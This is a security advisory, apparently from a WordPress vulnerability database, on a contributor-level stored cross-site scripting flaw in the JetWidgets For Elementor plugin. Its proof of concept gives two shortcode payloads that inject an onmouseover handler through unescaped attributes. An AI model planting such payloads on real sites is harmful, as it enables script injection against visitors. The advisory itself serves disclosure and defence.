WordPress Plugin Vulnerabilities

JetWidgets For Elementor < 1.0.14 - Contributor+ Stored XSS via Shortcode

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

[jw-posts show_image='yes' show_image_as='background' bg_position='" onmouseover="alert(/XSS/)"']

[jw-posts show_image='yes' show_image_as='background' bg_size='"onmouseover="alert(/XSS/)//']

Note: For the exploit, at least one of the posts must have a thumbnail image.

Affects Plugins

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-12-21 (about 1 years ago)
Added
2023-01-18 (about 1 years ago)
Last Updated
2023-03-06 (about 1 years ago)

Other